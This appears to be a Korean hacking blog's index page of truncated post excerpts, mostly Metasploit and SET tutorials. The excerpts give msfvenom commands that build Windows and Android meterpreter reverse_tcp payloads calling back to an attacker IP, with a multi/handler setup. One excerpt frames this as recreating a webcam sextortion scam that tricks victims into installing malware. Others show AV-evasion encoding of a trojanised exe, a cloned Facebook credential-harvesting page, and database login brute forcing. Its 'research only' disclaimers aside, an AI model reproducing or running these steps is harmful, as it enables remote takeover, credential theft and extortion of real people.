Lucete

모든 책임은 사용자 본인에게 있습니다.먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러를 만들어보자.먼저 msfconsole을 입력한다.use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp [우리가 파일을 만들때 사용한 payload]set LHOST [attacker ip]set LPORT ..

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다.먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다.그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.)그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/browser/java_jre17_jmxbean_2 명령어를 이용하여 핸들러를 만든다.우리가 다음 해야 할 행동으로 show options 을 이용하여 우리가 정해줘야하는 것을 본다.먼저 URIPATH 명령어를 이용하여 경로를 지정해준다. / 해도되고 test를 해도된다. 지정하지 않으면 ..

요즘 몸캠이 유행을 했었다.대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.)그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :)이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgresql 또한 시킨다.궁극적인 명령어 service metasploit start 로 metasploit 또한 실행시킨다.그 후 이제 악성코드를 만들어야 하는데...명령어 msfvenom을 이용 하여 만들어 보자.msfvenom -p android/meterpreter/revers..

모든 사용의 법적 책임은 사용자 본인에게 있습니다.msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exeex) msfvenom -a x86 --platform windows -x file.exe -k -p windows/meterpreter/reverse_tcp lhost=ip lport=4444 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exe핸들러에서 프로세스 옮기는 명령어migrate 프로세스 넘버ex) migrate 1111

모든 법적 책임은 사용자에게 있습니다.연구용으로만 사용하세요.먼저 Kali linux or parrot linux에서 터미널을 opensetoolkit을 입력한다.입력을 하면 이러한 창을 확인 하실수 있습니다. 여기서 Social-Engineering Attacks를 해야하기 위해 1번을 입력합니다.다음은 Website Attack Vectors을 위해 2번 여기에선 Credential Harvester Attack Method를 위해 3번 facebook을 만들기 위해 2번을 클릭합니다.여기까지 하셨으면 반왔습니다.2번을 하셨으면 IP를 입력하시면 되는데요!ip를 입력하면 이제 clone하기 위한 사이트를 입력하시면 됩니다. 저는 facebook.com을 하기위해 http://facebook.com을 ..

postgreSQL???service postgresql start <= 이 명령어를 사용하면서 의문이 드는 사람이 많을 것이다.과연 ? 이명령어는 무엇일까?metasploit을 사용할 때 postgreSQL 쓰는 이유는 postgreSQL스캐너를 이용하여 postgreSQL 데이터베이스를 공격하기 위해 연동을 시켜주는 것이다.그럼 왜 postgreSQL을 쓸까?postgreSQL는 세계에서 가장 진보된 오픈소스 데이터 베이스라고 칭찬을 받고 있기 때문이다. 또한 postgreSQL 모듈을 이용하여 많은 정보를 알수 있기 때문이다.모듈을 알아보자1. msfconsole2. search postgresql이 명령어로 사용가능한 모든 postgreSQL 모듈을 검색한다.여기서 한번 로그인 무차별 공격을 해보..

포트스캐닝에 관한 이야기를 계속하겠습니다.앞에서 말한거와 같이 포트스캐닝에는 nmap 같이 유명한 도구가 있습니다.우리는 msf 보조기능을 이용해보겠습니다.1. use auxiliary/scanner/smb/smb_version2. set rhosts 192.168.32.0/24192.168.32.0/24를 이용해 대역을 스캔하는 것이다.3. set threads 256이러게 함으로 run을 할 수 있다.여기서 조금더 자세히 알고싶고 아이피를 안다면 1. use auxiliary/scanner/netbios/nbname2. set rhosts IP3. set threads 256이렇게 하면 run을 할수 있다.IP대역을 이용하여 mysql 탐색하는 방법1. use auxiliary/scanner/mysq..

앞에의 글에서는 msfconsole 에서 company_name 을 이용해서 알아 보았다.이번에는 company_name 에서 알아낸 정보를 이용하여 보자.이를 이용하여 보자 .1. use auxiliary/gather/corpwatch_lookup_id이는 name 처럼 보조기능을 사용하는데 name 대신에 id를 이용하겠다는 것이다.2. set cw_id cw_40155이렇게 아이디를 지정하준다.3. set get_history true (true를 생략하니 false로 간주 한다.) 다음은 runrun을 하게 되면 cw_id에 입력한 값을 기반으로 검색을 한다.이러하듯 많은 정보를 얻을 수 있다. 또한 cw_~~~.txt로 저장도 해준다.다음은 msf에서 보조 기능을 이용하여 포트스캐닝을 해볼 것이..